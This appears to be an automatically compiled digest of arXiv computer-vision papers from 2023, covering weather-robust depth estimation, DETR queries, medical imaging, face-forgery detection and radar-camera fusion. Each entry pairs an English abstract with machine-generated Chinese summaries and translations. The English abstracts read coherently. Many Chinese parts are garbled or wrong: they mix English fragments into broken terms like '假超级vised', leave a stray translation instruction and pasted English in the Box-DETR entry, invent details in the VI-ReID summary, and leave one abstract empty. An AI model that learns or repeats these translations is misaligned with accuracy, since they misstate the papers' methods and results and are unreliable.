Current, self-supervised depth estimation architectures rely on clear and sunny weather scenes to train deep neural networks. However, in many locations, this assumption is too strong. For example in the UK (2021), 149 days consisted of rain. For these architectures to be effective in real-world applications, we must create models that can generalise to all weather conditions, times of the day and image qualities. Using a combination of computer graphics and generative models, one can augment existing sunny-weather data in a variety of ways that simulate adverse weather effects. While it is tempting to use such data augmentations for self-supervised depth, in the past this was shown to degrade performance instead of improving it. In this paper, we put forward a method that uses augmentations to remedy this problem. By exploiting the correspondence between unaugmented and augmented data we introduce a pseudo-supervised loss for both depth and pose estimation. This brings back some of the benefits of supervised learning while still not requiring any labels. We also make a series of practical recommendations which collectively offer a reliable, efficient framework for weather-related augmentation of self-supervised depth from monocular video. We present extensive testing to show that our method, Robust-Depth, achieves SotA performance on the KITTI dataset while significantly surpassing SotA on challenging, adverse condition data such as DrivingStereo, Foggy CityScape and NuScenes-Night. The project website can be found here https://kieran514.github.io/Robust-Depth-Project/.

摘要
当前的自助学深度估算架构假设需要清晰的天气和日光照明来训练深度学习模型。然而，在许多地方，这个假设是太强大。例如在英国（2021年），有149天雨天。为了使这些架构在实际应用中效果，我们需要创建可以总结到所有天气条件、时间和图像质量的模型。使用计算机图形和生成模型，我们可以对现有的晴天数据进行多种修改，以模拟不利的天气效果。尽管这可能看起来有趣，但在过去，这些数据修改方法实际上会降低性能而不是提高它。在这篇论文中，我们提出了一种使用修改来解决这个问题的方法。通过利用未修改和修改数据之间的对应关系，我们引入了一种假超级vised损失函数，用于估算深度和pose。这种方法可以带来一些supervised学习的好处，而不需要任何标签。我们还提供了一系列实用的建议，这些建议共同组成一个可靠、高效的气候相关数据修改框架，用于自助学深度从单光视频中的估算。我们对KITTI数据集进行了广泛的测试，并证明了我们的方法Robust-Depth可以在KITTI数据集上达到SotA性能，并在抗气候条件数据集上（如DrivingStereo、Foggy CityScape和NuScenes-Night）表现出显著超过SotA。 project网站的地址为https://kieran514.github.io/Robust-Depth-Project/.

Box-DETR: Understanding and Boxing Conditional Spatial Queries

paper_url: http://arxiv.org/abs/2307.08353
repo_url: https://github.com/tiny-smart/box-detr
paper_authors: Wenze Liu, Hao Lu, Yuliang Liu, Zhiguo Cao
for: 提高DETR的快速启动和检测性能
methods: 使用 conditional spatial queries 和 conditional linear projection，并将盒子信息转化为头specific agent points
results: 提高了启动速度和检测性能，例如使用 ResNet-50 的单个尺度模型达到了 $44.2$ APHere’s a brief summary of the paper in English:The paper proposes a method called Box Agent to improve the performance of DETR, a popular object detection framework. The method condenses the box information into head-specific agent points, allowing the conditional cross-attention to search for positions from a more reasonable starting point. This reduces the burden of the conditional linear projection and leads to faster convergence and improved detection performance. The method requires minor modifications to the code and has negligible computational workload.

Abstract
Conditional spatial queries are recently introduced into DEtection TRansformer (DETR) to accelerate convergence. In DAB-DETR, such queries are modulated by the so-called conditional linear projection at each decoder stage, aiming to search for positions of interest such as the four extremities of the box. Each decoder stage progressively updates the box by predicting the anchor box offsets, while in cross-attention only the box center is informed as the reference point. The use of only box center, however, leaves the width and height of the previous box unknown to the current stage, which hinders accurate prediction of offsets. We argue that the explicit use of the entire box information in cross-attention matters. In this work, we propose Box Agent to condense the box into head-specific agent points. By replacing the box center with the agent point as the reference point in each head, the conditional cross-attention can search for positions from a more reasonable starting point by considering the full scope of the previous box, rather than always from the previous box center. This significantly reduces the burden of the conditional linear projection. Experimental results show that the box agent leads to not only faster convergence but also improved detection performance, e.g., our single-scale model achieves $44.2$ AP with ResNet-50 based on DAB-DETR. Our Box Agent requires minor modifications to the code and has negligible computational workload. Code is available at https://github.com/tiny-smart/box-detr.

摘要
<> tranlate into Simplified Chinese Conditional spatial queries 是在 Detection Transformer (DETR) 中最近引入的，以加速减速。在 DAB-DETR 中，这些查询被称为 conditional linear projection 的模ulates，以每个解码器阶段进行搜索，以找到包括四个顶点的盒体的位置。每个解码器阶段都会逐渐更新盒体，通过预测盒体偏移量，而在跨attenion中只有盒体中心作为参考点。然而，使用只有盒体中心作为参考点，会使得上一个盒体的宽度和高度无法知道当前阶段，从而阻碍精确预测偏移量。我们认为，Explicitly 使用整个盒体信息在 cross-attention 中 matters。在这种情况下，我们提议使用 Box Agent 来压缩盒体到 head-specific agent point。通过在每个 head 中将盒体中心点 replaced 为代理点作为参考点， conditional cross-attention 可以从更加合理的起始点开始搜索，而不是总是从上一个盒体中心点开始。这会减轻 conditional linear projection 的负担。我们的 Box Agent 需要对代码进行 minor 的修改，并且计算工作负担几乎是零。代码可以在 https://github.com/tiny-smart/box-detr 上获取。Experimental results show that our single-scale model achieves $44.2$ AP with ResNet-50 based on DAB-DETR. Our Box Agent has two main advantages: faster convergence and improved detection performance. By using the entire box information in cross-attention, the agent can search for positions from a more reasonable starting point, rather than always from the previous box center. This significantly reduces the burden of the conditional linear projection. In addition, our Box Agent requires minor modifications to the code and has negligible computational workload, making it easy to implement and deploy.

Neural Modulation Fields for Conditional Cone Beam Neural Tomography

paper_url: http://arxiv.org/abs/2307.08351
repo_url: https://github.com/samuelepapa/cond-cbnt
paper_authors: Samuele Papa, David M. Knigge, Riccardo Valperga, Nikita Moriakov, Miltos Kofinas, Jan-Jakob Sonke, Efstratios Gavves
for: 提高CBCT重建精度
methods: 使用深度学习方法，包括conditional neural fields和Neural Modulation Field
results: 在不同数量的投影下，Conditional Cone Beam Neural Tomography表现更好，包括降低误差和提高精度

Abstract
Conventional Computed Tomography (CT) methods require large numbers of noise-free projections for accurate density reconstructions, limiting their applicability to the more complex class of Cone Beam Geometry CT (CBCT) reconstruction. Recently, deep learning methods have been proposed to overcome these limitations, with methods based on neural fields (NF) showing strong performance, by approximating the reconstructed density through a continuous-in-space coordinate based neural network. Our focus is on improving such methods, however, unlike previous work, which requires training an NF from scratch for each new set of projections, we instead propose to leverage anatomical consistencies over different scans by training a single conditional NF on a dataset of projections. We propose a novel conditioning method where local modulations are modeled per patient as a field over the input domain through a Neural Modulation Field (NMF). The resulting Conditional Cone Beam Neural Tomography (CondCBNT) shows improved performance for both high and low numbers of available projections on noise-free and noisy data.

摘要

Adaptive Local Basis Functions for Shape Completion

paper_url: http://arxiv.org/abs/2307.08348
repo_url: https://github.com/yinghdb/adaptive-local-basis-functions
paper_authors: Hui Ying, Tianjia Shao, He Wang, Yin Yang, Kun Zhou
for: 这个论文的目的是完成部分点云数据的3D形状完成任务，使用深度隐函数。
methods: 该方法使用适应本地基函数，不受限制于特定的函数形式，通过这些基函数实现本地到本地的形状完成框架。
results: 该方法比现有方法更高效，能够保留本地几何细节，涵盖更多的形状，并且可以在未看过的几何上进行扩展。

Abstract
In this paper, we focus on the task of 3D shape completion from partial point clouds using deep implicit functions. Existing methods seek to use voxelized basis functions or the ones from a certain family of functions (e.g., Gaussians), which leads to high computational costs or limited shape expressivity. On the contrary, our method employs adaptive local basis functions, which are learned end-to-end and not restricted in certain forms. Based on those basis functions, a local-to-local shape completion framework is presented. Our algorithm learns sparse parameterization with a small number of basis functions while preserving local geometric details during completion. Quantitative and qualitative experiments demonstrate that our method outperforms the state-of-the-art methods in shape completion, detail preservation, generalization to unseen geometries, and computational cost. Code and data are at https://github.com/yinghdb/Adaptive-Local-Basis-Functions.

摘要
在这篇论文中，我们关注3D形状完成从部分点云使用深度隐函数的任务。现有方法通常使用块化基函数或一定家族函数（例如高斯函数），这会导致高计算成本或局部形态表达力有限。相反，我们的方法使用适应地ocal基函数，这些基函数通过端到端学习而不受限制。基于这些基函数，我们提出了一种本地到本地的形状完成框架。我们的算法可以学习少量的基函数参数，同时保留完成过程中的地方准确性。量化和质量实验表明，我们的方法在形状完成、准确性、未经见过的几何体 generale和计算成本方面都高于当前的方法。代码和数据可以在https://github.com/yinghdb/Adaptive-Local-Basis-Functions上找到。

Soft Curriculum for Learning Conditional GANs with Noisy-Labeled and Uncurated Unlabeled Data

paper_url: http://arxiv.org/abs/2307.08319
repo_url: None
paper_authors: Kai Katsumata, Duc Minh Vo, Tatsuya Harada, Hideki Nakayama
for: 用于提高 conditional generative adversarial network 的训练，使其能够处理含有噪声和无标签数据的情况。
methods: 提出了一种新的 Conditional Image Generation 框架，该框架在训练时接受噪声和无标签数据，并使用 soft curriculum learning 来杜绝噪声和无标签数据的影响。
results: 对比 semi-supervised 和 label-noise 鲁棒方法，提出的方法在量化和质量上均达到了更高的表现。特别是，该方法能够与少于半个标注数据的情况下匹配 semi-supervised GANs 的表现。

Abstract
Label-noise or curated unlabeled data is used to compensate for the assumption of clean labeled data in training the conditional generative adversarial network; however, satisfying such an extended assumption is occasionally laborious or impractical. As a step towards generative modeling accessible to everyone, we introduce a novel conditional image generation framework that accepts noisy-labeled and uncurated unlabeled data during training: (i) closed-set and open-set label noise in labeled data and (ii) closed-set and open-set unlabeled data. To combat it, we propose soft curriculum learning, which assigns instance-wise weights for adversarial training while assigning new labels for unlabeled data and correcting wrong labels for labeled data. Unlike popular curriculum learning, which uses a threshold to pick the training samples, our soft curriculum controls the effect of each training instance by using the weights predicted by the auxiliary classifier, resulting in the preservation of useful samples while ignoring harmful ones. Our experiments show that our approach outperforms existing semi-supervised and label-noise robust methods in terms of both quantitative and qualitative performance. In particular, the proposed approach is able to match the performance of (semi-) supervised GANs even with less than half the labeled data.

摘要
文本中的描述：用于资料准备的标签噪声或精心挑选的无标签数据被用来补偿 conditional generative adversarial network 的假设，但满足这种扩展的假设 occasional 是劳动ious 或 impractical。为了实现 everyone 可以接触的生成模型，我们介绍了一种新的 conditional 图像生成框架，该框架在训练时接受噪声标签和无标签数据：（i） closed-set 和 open-set 标签噪声在标签数据中，（ii） closed-set 和 open-set 无标签数据。为了解决这个问题，我们提出了软预科学学习，它在对抗式训练中分配每个实例的权重，并为无标签数据分配新的标签，并对标签数据中的错误标签进行更正。与传统的预科学学习不同，我们的软预科学学习不使用阈值来选择训练样本，而是使用辅助分类器预测的权重来控制每个训练实例的影响，从而保留有用的样本，而忽略有害的样本。我们的实验显示，我们的方法在量化和质量上都超过了现有的半支持和标签噪声鲁棒方法。特别是，我们的方法能够与少于半个标签数据相当的性能。

Airway Label Prediction in Video Bronchoscopy: Capturing Temporal Dependencies Utilizing Anatomical Knowledge

paper_url: http://arxiv.org/abs/2307.08318
repo_url: None
paper_authors: Ron Keuth, Mattias Heinrich, Martin Eichenlaub, Marian Himstedt
for:本研究旨在提供无需电磁跟踪和特定病人CT扫描的视觉导航，以便在肺部手术中进行其他应用程序，如医学护理室。methods:本研究使用单帧图像分类和肺部模型来实现视觉导航，而不需要电磁跟踪和特定病人CT扫描。研究者们通过 incorporating sequences of CNN-based airway likelihoods into a Hidden Markov Model 来使用 topological bronchoscope localization 和 anatomical constraints 来提高导航精度。results:研究者们通过多个实验在肺部模型中评估了该方法，并发现该方法可以提高导航精度至0.98，比之前的0.81（加权平均值：0.98 vs 0.81）。这表明， combining CNN-based single image classification of airway segments with anatomical constraints and temporal HMM-based inference 可以提供高度的视觉导航。

Abstract
Purpose: Navigation guidance is a key requirement for a multitude of lung interventions using video bronchoscopy. State-of-the-art solutions focus on lung biopsies using electromagnetic tracking and intraoperative image registration w.r.t. preoperative CT scans for guidance. The requirement of patient-specific CT scans hampers the utilisation of navigation guidance for other applications such as intensive care units. Methods: This paper addresses navigation guidance solely incorporating bronchosopy video data. In contrast to state-of-the-art approaches we entirely omit the use of electromagnetic tracking and patient-specific CT scans. Guidance is enabled by means of topological bronchoscope localization w.r.t. an interpatient airway model. Particularly, we take maximally advantage of anatomical constraints of airway trees being sequentially traversed. This is realized by incorporating sequences of CNN-based airway likelihoods into a Hidden Markov Model. Results: Our approach is evaluated based on multiple experiments inside a lung phantom model. With the consideration of temporal context and use of anatomical knowledge for regularization, we are able to improve the accuracy up to to 0.98 compared to 0.81 (weighted F1: 0.98 compared to 0.81) for a classification based on individual frames. Conclusion: We combine CNN-based single image classification of airway segments with anatomical constraints and temporal HMM-based inference for the first time. Our approach renders vision-only guidance for bronchoscopy interventions in the absence of electromagnetic tracking and patient-specific CT scans possible.

摘要
目的：用视频镜头导航是肺部内部手术中的关键需求，现代解决方案主要采用电磁 tracking和实时 CT 图像对比为导航。但这些方法受到patient-specific CT 图像的限制，不能用于医学加护部门。方法：本文提出一种具有唯视导航的方法，与现有方法不同之处在于完全不使用电磁 tracking和patient-specific CT 图像。我们通过基于隐藏 Markov 模型的空间排序和 CNN 网络来实现导航。特别是，我们利用隐藏 Markov 模型中的排序和 CNN 网络来使用排序的 temporal 上下文和空间上下文来进行补做，从而提高导航的准确性。结果：我们在肺部模型中进行了多个实验，结果表明，我们的方法可以提高准确性至 0.98，比对 individual 帧的分类结果更高（weighted F1 分数为 0.98，对比 0.81）。结论：我们结合了 CNN 网络基于单个图像分类和空间排序的方法，并利用 temporal HMM 模型来进行推理。这种方法可以在没有电磁 tracking和patient-specific CT 图像的情况下实现肺部内部手术的视野导航。

AltFreezing for More General Video Face Forgery Detection

paper_url: http://arxiv.org/abs/2307.08317
repo_url: https://github.com/zhendongwang6/altfreezing
paper_authors: Zhendong Wang, Jianmin Bao, Wengang Zhou, Weilun Wang, Houqiang Li
for: 这个论文主要应用于面伪造检测，对于已知的攻击方法进行防护。
methods: 本文提出了一个捷径的方法，通过结合空间和时间特征以检测面伪造。具体来说，是使用3D ConvNet来捕捉空间和时间特征，并通过AltFreezing训练策略来鼓励模型对于空间和时间类型的伪造进行检测。
results: 实验结果显示，该方法能够超越现有的方法，具有更好的扩展性和应用性。

Abstract
Existing face forgery detection models try to discriminate fake images by detecting only spatial artifacts (e.g., generative artifacts, blending) or mainly temporal artifacts (e.g., flickering, discontinuity). They may experience significant performance degradation when facing out-domain artifacts. In this paper, we propose to capture both spatial and temporal artifacts in one model for face forgery detection. A simple idea is to leverage a spatiotemporal model (3D ConvNet). However, we find that it may easily rely on one type of artifact and ignore the other. To address this issue, we present a novel training strategy called AltFreezing for more general face forgery detection. The AltFreezing aims to encourage the model to detect both spatial and temporal artifacts. It divides the weights of a spatiotemporal network into two groups: spatial-related and temporal-related. Then the two groups of weights are alternately frozen during the training process so that the model can learn spatial and temporal features to distinguish real or fake videos. Furthermore, we introduce various video-level data augmentation methods to improve the generalization capability of the forgery detection model. Extensive experiments show that our framework outperforms existing methods in terms of generalization to unseen manipulations and datasets. Code is available at https: //github.com/ZhendongWang6/AltFreezing.

摘要
现有的面孔伪造检测模型通常仅仅检测到空间artefacts（例如生成artefacts、融合）或主要是时间artefacts（例如闪烁、缺失连续性）。它们可能会在面对不同领域artefacts时表现出显著性能下降。在这篇论文中，我们提议一种捕捉空间和时间artefacts的一体化模型 для面孔伪造检测。一种简单的想法是利用三维ConvNet。然而，我们发现它可能会很容易依赖于一种类型的artefact并忽略另一种。为了解决这个问题，我们提出了一种新的训练策略called AltFreezing，旨在促进模型检测空间和时间artefacts。它将把一个三维网络的Weight分为两组：空间相关和时间相关。然后，这两组的Weight在训练过程中被 alternate 冻结，以便模型可以学习空间和时间特征来 distinguish real or fake videos。此外，我们还引入了多种视频级数据增强方法，以提高伪造检测模型的通用性。广泛的实验结果表明，我们的框架在面对未seen manipulations和数据集时表现出优于现有方法。代码可以在中下载。

Bridging the Gap: Multi-Level Cross-Modality Joint Alignment for Visible-Infrared Person Re-Identification

paper_url: http://arxiv.org/abs/2307.08316
repo_url: None
paper_authors: Tengfei Liang, Yi Jin, Wu Liu, Tao Wang, Songhe Feng, Yidong Li
for: 解决可见光和infrared摄像头之间的人识别问题，即人识别任务中的跨模态图像检索问题。
methods: 提出了一种简单而有效的方法，即多级跨模态共同准备（MCJA），它通过修正模态和目标水平的差距，解决了跨模态图像检索问题。
results: 在实验中，该方法通过增加模态匹配级联augmenation和跨模态检索损失，实现了提高跨模态图像检索的性能，并可以作为VI-ReID领域的强大基线方法。

Abstract
Visible-Infrared person Re-IDentification (VI-ReID) is a challenging cross-modality image retrieval task that aims to match pedestrians' images across visible and infrared cameras. To solve the modality gap, existing mainstream methods adopt a learning paradigm converting the image retrieval task into an image classification task with cross-entropy loss and auxiliary metric learning losses. These losses follow the strategy of adjusting the distribution of extracted embeddings to reduce the intra-class distance and increase the inter-class distance. However, such objectives do not precisely correspond to the final test setting of the retrieval task, resulting in a new gap at the optimization level. By rethinking these keys of VI-ReID, we propose a simple and effective method, the Multi-level Cross-modality Joint Alignment (MCJA), bridging both modality and objective-level gap. For the former, we design the Modality Alignment Augmentation, which consists of three novel strategies, the weighted grayscale, cross-channel cutmix, and spectrum jitter augmentation, effectively reducing modality discrepancy in the image space. For the latter, we introduce a new Cross-Modality Retrieval loss. It is the first work to constrain from the perspective of the ranking list, aligning with the goal of the testing stage. Moreover, based on the global feature only, our method exhibits good performance and can serve as a strong baseline method for the VI-ReID community.

摘要
visible-infrared人Re-IDentification（VI-ReID）是一个复杂的跨模态图像检索任务，旨在匹配人员的图像在可见和红外摄像头之间。为解决模态差距，现有主流方法采用学习做法，将图像检索任务转化为图像分类任务，使用十字积分损失和辅助度量学习损失。这些损失采用缩短内类距离和增加间类距离的策略，但这些目标不准确反映最终测试阶段的检索任务，导致新的优化差距。通过重新思考VI-ReID的关键，我们提出了一种简单有效的方法：多级跨模态联合准确（MCJA）。它通过以下三种新策略来减少模态差距：1. 模态准确增强：对于每个图像，使用权重规则来增强模态准确性。2. 交叉通道CMix：在不同模态之间进行交叉通道的混合，以提高模态之间的匹配度。3. 谱谱异常增强：在不同模态之间进行谱谱异常的增强，以提高模态之间的匹配度。此外，我们还引入了一种新的跨模态检索损失，它是根据排序列表来约束的，与测试阶段的目标相匹配。我们的方法只使用全球特征，可以在VI-ReID领域中作为一个强大基线方法。

Rethinking Intersection Over Union for Small Object Detection in Few-Shot Regime

paper_url: http://arxiv.org/abs/2307.09562
repo_url: None
paper_authors: Pierre Le Jeune, Anissa Mokraoui
for: 提高小 объек的检测精度
methods: 使用Scale-adaptive Intersection over Union（SIoU）作为评价指标和训练损失函数
results: 在小 объек检测 task 中，SIoU 可以大幅提高模型的性能，特别是在 aerial 图像中，其达到了新的顶峰性能Here’s a more detailed explanation of each point:
for: The paper is written to improve the accuracy of detecting small objects in few-shot object detection (FSOD) tasks.
methods: The paper proposes using a novel box similarity measure called Scale-adaptive Intersection over Union (SIoU) as an evaluation criterion and a loss function to prioritize small objects during training.
results: The paper shows that SIoU improves significantly the performance of small object detection in both natural (Pascal VOC and COCO datasets) and aerial images (DOTA and DIOR), especially in the aerial imagery where small objects are critical, and achieves new state-of-the-art FSOD performance on DOTA and DIOR.

Abstract
In Few-Shot Object Detection (FSOD), detecting small objects is extremely difficult. The limited supervision cripples the localization capabilities of the models and a few pixels shift can dramatically reduce the Intersection over Union (IoU) between the ground truth and predicted boxes for small objects. To this end, we propose Scale-adaptive Intersection over Union (SIoU), a novel box similarity measure. SIoU changes with the objects' size, it is more lenient with small object shifts. We conducted a user study and SIoU better aligns than IoU with human judgment. Employing SIoU as an evaluation criterion helps to build more user-oriented models. SIoU can also be used as a loss function to prioritize small objects during training, outperforming existing loss functions. SIoU improves small object detection in the non-few-shot regime, but this setting is unrealistic in the industry as annotated detection datasets are often too expensive to acquire. Hence, our experiments mainly focus on the few-shot regime to demonstrate the superiority and versatility of SIoU loss. SIoU improves significantly FSOD performance on small objects in both natural (Pascal VOC and COCO datasets) and aerial images (DOTA and DIOR). In aerial imagery, small objects are critical and SIoU loss achieves new state-of-the-art FSOD on DOTA and DIOR.

摘要
几个框架内部对象检测（FSOD）中，检测小对象非常困难。有限的监督使得模型的地方化能力受到限制，几个像素的偏移可以导致对真实值和预测框之间的交集覆盖率（IoU）减少很多。为了解决这个问题，我们提出了适应缩放交集覆盖率（SIoU），一种新的框 similarity度量。SIoU随对象的大小变化，对小对象的偏移更加宽容。我们进行了用户研究，发现SIoU与人类判断更加一致。使用SIoU作为评价标准可以建立更用户 oriented的模型。SIoU还可以作为训练 criterion，以优先级驱动模型在训练中学习小对象。SIoU在几何shot regime中显著提高了小对象检测性能，但这种设定是在实际应用中不切实际的，因为检测框 datasets通常是非常昂贵的。因此，我们的实验主要集中在几何shot regime中，以示SIoU损失的优越性和多样性。SIoU在自然图像（Pascal VOC和COCO datasets）和航空图像（DOTA和DIOR）上显著提高了小对象检测性能。在航空图像中，小对象非常重要，SIoU损失实现了新的状态的法Socket的FSOD。

RCM-Fusion: Radar-Camera Multi-Level Fusion for 3D Object Detection

paper_url: http://arxiv.org/abs/2307.10249
repo_url: None
paper_authors: Jisong Kim, Minjae Seong, Geonho Bang, Dongsuk Kum, Jun Won Choi
for: 本研究旨在提出一种基于雷达和摄像头的多级融合方法（RCM-Fusion），以完全利用雷达信息并提高3D对象检测性能。
methods: 本方法在feature级和实例级进行了雷达和摄像头的多级融合，包括Radar Guided BEV Encoder和Radar Grid Point Refinement module。Radar Guided BEV Encoder利用雷达 Bird’s-Eye-View特征将图像特征转换为精确的BEV表示，然后适应性地组合了雷达和摄像头的BEV特征。Radar Grid Point Refinement模块通过考虑雷达点云特征来减少本地化错误。
results: 在公共的nuScenes数据集上进行了实验，并证明了我们的提出的RCM-Fusion方法与摄像头只的基准模型相比，提高了11.8%的nuScenes检测得分（NDS），并在nuScenes 3D对象检测 benchmark中实现了雷达-摄像头融合方法的州际之最性能。

Abstract
While LiDAR sensors have been succesfully applied to 3D object detection, the affordability of radar and camera sensors has led to a growing interest in fusiong radars and cameras for 3D object detection. However, previous radar-camera fusion models have not been able to fully utilize radar information in that initial 3D proposals were generated based on the camera features only and the instance-level fusion is subsequently conducted. In this paper, we propose radar-camera multi-level fusion (RCM-Fusion), which fuses radar and camera modalities at both the feature-level and instance-level to fully utilize radar information. At the feature-level, we propose a Radar Guided BEV Encoder which utilizes radar Bird's-Eye-View (BEV) features to transform image features into precise BEV representations and then adaptively combines the radar and camera BEV features. At the instance-level, we propose a Radar Grid Point Refinement module that reduces localization error by considering the characteristics of the radar point clouds. The experiments conducted on the public nuScenes dataset demonstrate that our proposed RCM-Fusion offers 11.8% performance gain in nuScenes detection score (NDS) over the camera-only baseline model and achieves state-of-the-art performaces among radar-camera fusion methods in the nuScenes 3D object detection benchmark. Code will be made publicly available.

摘要
而LiDAR感知器已经成功应用于3D物体检测中，但由于雷达和摄像头感知器的可Affordability，有关 fusion 雷达和摄像头的研究在紧张起来。然而，之前的雷达-摄像头融合模型尚未能充分利用雷达信息，因为初始的3D提案都是基于摄像头特征来生成的，然后进行了实例级融合。在这篇论文中，我们提议了雷达-摄像头多级融合（RCM-Fusion）模型，该模型在特征级和实例级都进行雷达和摄像头模态的融合，以完全利用雷达信息。在特征级上，我们提出了雷达导航BEV编码器，该编码器利用雷达 bird's-eye-view（BEV）特征将图像特征转换为准确的BEV表示，然后适应性地合并雷达和摄像头BEV特征。在实例级上，我们提出了雷达网点精度修正模块，该模块通过考虑雷达点云特征来减少局部定位错误。我们在公共的 nuScenes 数据集上进行了实验，结果显示，我们提出的 RCM-Fusion 与摄像头基eline模型相比，提高 nuScenes 检测分数（NDS）11.8%，并在 nuScenes 3D物体检测比赛中实现了雷达-摄像头融合方法的状态器。代码将公开发布。

Combiner and HyperCombiner Networks: Rules to Combine Multimodality MR Images for Prostate Cancer Localisation

paper_url: http://arxiv.org/abs/2307.08279
repo_url: None
paper_authors: Wen Yan, Bernard Chiu, Ziyi Shen, Qianye Yang, Tom Syer, Zhe Min, Shonit Punwani, Mark Emberton, David Atkinson, Dean C. Barratt, Yipeng Hu
for: 这种研究的目的是使用报告系统PI-RADS v2.1，评估multiparametric MR扫描图像中的肾癌风险。
methods: 这种研究使用了低维度Parametric模型，模型PI-RADS决策规则，以及HyperCombiner网络来训练一个单一的图像分割网络。
results: 实验结果基于850名患者的数据，表明，使用Combiner网络可以提高图像分割的效率，同时可以获得和解释个体图像模式的线性权重或征兆，以及评估图像可用性、重要性和规则发现等临床应用。

Abstract
One of the distinct characteristics in radiologists' reading of multiparametric prostate MR scans, using reporting systems such as PI-RADS v2.1, is to score individual types of MR modalities, T2-weighted, diffusion-weighted, and dynamic contrast-enhanced, and then combine these image-modality-specific scores using standardised decision rules to predict the likelihood of clinically significant cancer. This work aims to demonstrate that it is feasible for low-dimensional parametric models to model such decision rules in the proposed Combiner networks, without compromising the accuracy of predicting radiologic labels: First, it is shown that either a linear mixture model or a nonlinear stacking model is sufficient to model PI-RADS decision rules for localising prostate cancer. Second, parameters of these (generalised) linear models are proposed as hyperparameters, to weigh multiple networks that independently represent individual image modalities in the Combiner network training, as opposed to end-to-end modality ensemble. A HyperCombiner network is developed to train a single image segmentation network that can be conditioned on these hyperparameters during inference, for much improved efficiency. Experimental results based on data from 850 patients, for the application of automating radiologist labelling multi-parametric MR, compare the proposed combiner networks with other commonly-adopted end-to-end networks. Using the added advantages of obtaining and interpreting the modality combining rules, in terms of the linear weights or odds-ratios on individual image modalities, three clinical applications are presented for prostate cancer segmentation, including modality availability assessment, importance quantification and rule discovery.

摘要
一个 radiologists 在多 Parametric prostate MR 扫描结果中的一个特征是，使用如 PI-RADS v2.1 的报告系统，对不同的 MR 模式（T2 重度、Diffusion 重度和动力刺激）进行分数，然后使用标准化的决策规则来预测肿瘤的可能性。这个工作的目的是证明可以使用低维度 Parametric 模型来模型这些决策规则，无需损失预测 радиологи labels 的准确性。首先，证明了线性混合模型或非线性堆叠模型都可以模型 PI-RADS 决策规则，用于Localizing 肿瘤。其次，通过将这些（总体）线性模型的参数作为权重来，以便在 Combiner 网络训练中对多个网络进行权重合并。在执行时，通过将这些参数作为 Condition 来，可以 conditioning 这些参数来提高效率。基于850名患者的数据，对多 Parametric MR 自动标注的 radiologist 标注进行比较，提出了Combiner 网络和其他常见的端到端网络之间的比较。通过获得和解释模式结合规则的优点，包括对单个图像模式的线性权重或抽象比率，对肿瘤 segmentation 进行三个临床应用：评估模式可用性、重要性评估和规则发现。

Adversarial Attacks on Traffic Sign Recognition: A Survey

paper_url: http://arxiv.org/abs/2307.08278
repo_url: None
paper_authors: Svetlana Pavlitska, Nico Lambing, J. Marius Zöllner
for: 这篇论文主要针对的是自动驾驶车辆的视觉系统中的交通标志识别问题，以及这个问题如何受到深度神经网络（DNNs）的攻击。
methods: 该论文主要采用了现有的深度神经网络（DNNs）进行交通标志识别和分类，并对这些模型进行了数字和实际攻击。
results: 该论文提供了现有的攻击研究的概述，并指出了需要进一步研究的领域。

Abstract
Traffic sign recognition is an essential component of perception in autonomous vehicles, which is currently performed almost exclusively with deep neural networks (DNNs). However, DNNs are known to be vulnerable to adversarial attacks. Several previous works have demonstrated the feasibility of adversarial attacks on traffic sign recognition models. Traffic signs are particularly promising for adversarial attack research due to the ease of performing real-world attacks using printed signs or stickers. In this work, we survey existing works performing either digital or real-world attacks on traffic sign detection and classification models. We provide an overview of the latest advancements and highlight the existing research areas that require further investigation.

摘要
自动驾驶车辆的见识功能中，交通标志识别是一个重要的组成部分，目前大多数使用深度神经网络（DNNs）进行实现。但是，DNNs已知容易受到对抗攻击。许多前期工作已经证明了对交通标志识别模型的攻击的可行性。由于交通标志的易于获得和修改，交通标志识别模型在实际攻击中具有极高的潜在危害性。在这种情况下，我们对交通标志检测和分类模型的攻击进行了评估和概述，并 highlighted 需要进一步研究的领域。

Liver Tumor Screening and Diagnosis in CT with Pixel-Lesion-Patient Network

paper_url: http://arxiv.org/abs/2307.08268
repo_url: None
paper_authors: Ke Yan, Xiaoli Yin, Yingda Xia, Fakai Wang, Shu Wang, Yuan Gao, Jiawen Yao, Chunli Li, Xiaoyu Bai, Jingren Zhou, Ling Zhang, Le Lu, Yu Shi
for: liver tumor segmentation and classification in non-contrast and dynamic contrast-enhanced CT images
methods: mask transformer with improved anchor queries and foreground-enhanced sampling loss, and an image-wise classifier to aggregate global information
results: high accuracy in tumor screening and lesion segmentation, and on par with a senior human radiologist in a reader study

Abstract
Liver tumor segmentation and classification are important tasks in computer aided diagnosis. We aim to address three problems: liver tumor screening and preliminary diagnosis in non-contrast computed tomography (CT), and differential diagnosis in dynamic contrast-enhanced CT. A novel framework named Pixel-Lesion-pAtient Network (PLAN) is proposed. It uses a mask transformer to jointly segment and classify each lesion with improved anchor queries and a foreground-enhanced sampling loss. It also has an image-wise classifier to effectively aggregate global information and predict patient-level diagnosis. A large-scale multi-phase dataset is collected containing 939 tumor patients and 810 normal subjects. 4010 tumor instances of eight types are extensively annotated. On the non-contrast tumor screening task, PLAN achieves 95% and 96% in patient-level sensitivity and specificity. On contrast-enhanced CT, our lesion-level detection precision, recall, and classification accuracy are 92%, 89%, and 86%, outperforming widely used CNN and transformers for lesion segmentation. We also conduct a reader study on a holdout set of 250 cases. PLAN is on par with a senior human radiologist, showing the clinical significance of our results.

摘要
liver tumor segmentation和分类是计算机辅助诊断中的重要任务。我们想要解决三个问题：肝肿征检测和初步诊断在不含对比 computed tomography（CT）图像，以及在动态对比增强CT图像中的差异诊断。我们提出了一个名为Pixel-Lesion-pAtient Network（PLAN）的框架。它使用一个面对transformer来同时段和类别每个肿瘤，并使用改进的锚点查询和前景增强抽象损失来提高精度。它还有一个图像级别分类器，可以有效地聚合全局信息并预测患者级别诊断。我们收集了一个大规模多阶段数据集，包括939名患者和810名正常人。4010个肿瘤实例中有八种类型得到了广泛的注释。在非对比肿征检测任务上，PLAN达到了95%和96%的患者级别敏感性和特异性。在对比CT图像上，我们的肿瘤水平检测精度、回归率和分类精度分别为92%, 89%和86%，超越了广泛使用的CNN和transformers для肿瘤 segmentation。我们还进行了一次读者研究，并证明PLAN与一名高级人类Radiologist在250个案例中的表现相当。

Extreme Image Compression using Fine-tuned VQGAN Models

paper_url: http://arxiv.org/abs/2307.08265
repo_url: None
paper_authors: Qi Mao, Tinghan Yang, Yinuo Zhang, Shuyin Pan, Meng Wang, Shiqi Wang, Siwei Ma
for: 提高压缩数据的感知质量，特别是在低比特率下。
